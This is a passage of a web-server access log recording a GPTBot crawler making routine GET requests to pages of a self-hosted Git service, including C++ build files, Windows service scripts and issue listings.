+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:18:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:18:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=source" [Client 74.7.227.38] [Length 16063] [Gzip 5.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:18:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2fProject%20Planning-1.md" [Client 74.7.227.38] [Length 48109] [Gzip 12.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" +[17/Feb/2026:18:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:18:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:18:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=closed&type=all" +[17/Feb/2026:18:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 14576] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 15130] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 13103] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 13379] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:09:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 25914] [Gzip 15.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 13250] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D" +[17/Feb/2026:18:09:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" [Client 74.7.227.38] [Length 10023] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:18:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16721] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Contact.tsx" +[17/Feb/2026:18:09:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 15128] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx" +[17/Feb/2026:18:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 11166] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/components/Hero.tsx" +[17/Feb/2026:18:09:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:18:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 10021] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:09:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 10029] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 15673] [Gzip 9.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:09:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 13368] [Gzip 7.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 10029] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:09:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 12643] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:10:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 10022] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 10020] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:10:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" [Client 74.7.227.38] [Length 2595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:18:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 3572] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:10:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" [Client 74.7.227.38] [Length 14864] [Gzip 8.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:18:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" [Client 74.7.227.38] [Length 1341] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:18:10:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 3170] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" [Client 74.7.227.38] [Length 2394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:18:10:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" [Client 74.7.227.38] [Length 15227] [Gzip 7.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:18:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:10:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:10:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11385] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:18:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11390] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:18:10:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11386] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:18:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" +[17/Feb/2026:18:10:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:18:10:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=open&type=all" +[17/Feb/2026:18:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:10:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 